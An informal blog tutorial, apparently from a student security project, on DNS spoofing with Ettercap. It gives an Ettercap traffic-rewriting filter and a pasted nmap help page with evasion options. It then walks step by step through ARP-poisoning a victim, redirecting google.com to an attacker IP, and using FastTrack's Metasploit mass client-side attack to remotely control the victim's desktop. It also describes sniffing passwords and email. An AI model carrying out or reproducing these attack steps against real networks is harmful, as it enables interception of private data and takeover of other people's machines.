DNS Spoofing- The Basics to advances

INTRO
I Did a lots of research for my tiny network security project group regarding this topic..while other groups just present the basic security ...So here...we start from the basic

First you need to know what is DNS . I try to narrow the scope...DNS spoofing is kind of modification attack , where we steal the packet/s transmit and change it according to what we want.IF you googling around ,you will found that the basic of dns spoofing can be easily obtained/practice using ettercap . You should able to grap the basic using this howto .

If you install the ettercap , it only provides the basic of 'man in the middle' stuffs . For advance usage ,try to play around with filter ...example given here

filter -->

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
   # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.src == 80) {
msg("in Second IF\n");
if (search(DECODED.data, "Hello")){
replace("Hello", "12345");
msg("run\n");
}

if (search(DATA.data, "Google")){
replace("Google", "GOOGLE HACKED");
msg("run2\n");
}
}

ExamPLE


DAILY FUN

now where were we...ok..You can play around ettercap with wireshack ..it really fun because while you a poisoning a specific machine ...you are able to read the message or any kind of text he post to the network by using wireshack(example : text that i'm writing here..LOL) ..it apply to private data such as username and password too...even the basic ettercap able to capture email private data ... the most popular testing email use is gmail,don't really sure why though .....other tools that you might be interest are

nslookup -look for ip specific website

Note that you can get more data if you run nslookup with specific ip

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup  irongeek.com
Server:  10.0.7.254
Address: 10.0.7.254#53

Non-authoritative answer:
Name: irongeek.com
Address: 208.97.169.250

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup   208.97.169.250
Server:  10.0.7.254
Address: 10.0.7.254#53

Non-authoritative answer:
250.169.97.208.in-addr.arpa name = apache2-linus.lankershim.dreamhost.com.

Authoritative answers can be found from:
169.97.208.in-addr.arpa nameserver = NS3.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS1.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS2.dreamhost.com.

Nmap - Network scanner

This sometimes might be just simple vanurable scanner ...but at the same time..is really dangerous ...there are a many option provided

[ reez @ alexendeRReez : /home/reez/Desktop ] nmap -help
Nmap 4.68 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO [protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sO: IP protocol scan
-b : FTP bounce scan
--traceroute: Trace hop path to each host
--reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan  most common ports
--port-ratio : Scan ports more common than 
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=:  is a comma separated list of
       directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take  are in milliseconds, unless you append 's'
(seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
-T[0-5]: Set timing template (higher is faster)
--min-hostgroup/max-hostgroup : Parallel host scan group sizes
--min-parallelism/max-parallelism : Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout : Specifies
  probe round trip time.
--max-retries : Caps number of port scan probe retransmissions.
--host-timeout : Give up on target after this long
--scan-delay/--max-scan-delay : Adjust delay between probes
--min-rate : Send packets no slower than  per second
--max-rate : Send packets no faster than  per second
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu : fragment packets (optionally w/given MTU)
-D : Cloak a scan with decoys
-S : Spoof source address
-e : Use specified interface
-g/--source-port : Use given port number
--data-length : Append random data to sent packets
--ip-options : Send packets with specified ip options
--ttl : Set IP time-to-live field
--spoof-mac : Spoof your MAC address
--badsum: Send packets with a bogus TCP/UDP checksum
OUTPUT:
-oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once
-v: Increase verbosity level (use twice or more for greater effect)
-d[level]: Set or increase debugging level (Up to 9 is meaningful)
--open: Only show open (or possibly open) ports                   [ 06:10:27 ]
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
--resume : Resume an aborted scan
--stylesheet : XSL stylesheet to transform XML output to HTML
--webxml: Reference stylesheet from Nmap.Org for more portable XML
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
-6: Enable IPv6 scanning
-A: Enables OS detection and Version detection, Script scanning and Traceroute
--datadir : Specify custom Nmap data file location
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges
-V: Print version number
-h: Print this help summary page.
EXAMPLES:
nmap -v -A scanme.nmap.org
nmap -v -sP 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -PN -p 80

ADVANCES

enough with the craps...ok..lets see...how i apply in real situation (my tiny network security project)

1. Open Ettercap
#ettercap -G
2. Go to option = Sniff -> Unified sniffing
3. Scan for host to get lists of LAN connections in LAN using option = Hosts -> Scan for hosts
4. Set the target; usually choose one IP as victim IP, and its DNS server example
Victim’s IP: 164.0.3.47
Server’s IP: 164.0.3.254
5. We launch the MiTM attacks which is ARP (Address Resolution Protocol) poisoning.
6. Then, check difference packet capture in victim computer using Wireshark before launching the
MiTM attack and when it is still occurring.
7. i) Edit file, usually name: /usr/local/share/ettercap/etter.dns
ii) Point the target URL to our IP address (intend to spoof but as we are demonstrating Mass Client
Side Attack , we point the URL to the Attacker IP address).
Example:
google.com A
*.google.com A
www.google.com PTR
iii) Close and save the text file.
In Ettercap GUI(Graphical User Interface)tools, check the available plugins by clicking DNS
spoofing or by using command line
Ettercap –T –q –M arp:remote –P dns_spoof //

8. Check the IP address using Nslookup again and it will give difference output compare to the initial
Nslookup test before starting MiTM attack in the previous steps (Cmd/windows terminal
) as it should point to the Attacker IP address.
9. It is mean whenever victim open browser to browse google.com, it will redirect to the Attacker IP
Address.
10. Open the FastTrack application which is listed under Penetration in the BackTrack Operating
System.
11. At the Shell FastTrack Main Menu, choose the number 2 option for: External Hacking. Then, you
must select number 7 option for: Metaspoit Mass Client-Side Attack.
12. Check the IP address using ipconfig(windows) or ifconfig(Linux)
13. Next thing to do is entering IP address for Apache and press the enter button.
14. When the victim browse google.com, it will redirect victim to Attacker IP address (9) and the
attacker starts to attack.
15. We have to wait until the Framework connects to the system. After that, we are able to remote
victim desktop and modified anything as we wish.

I Will explain about Framework in other post....so see you in next post...You might want to googling around for other example...

WooT!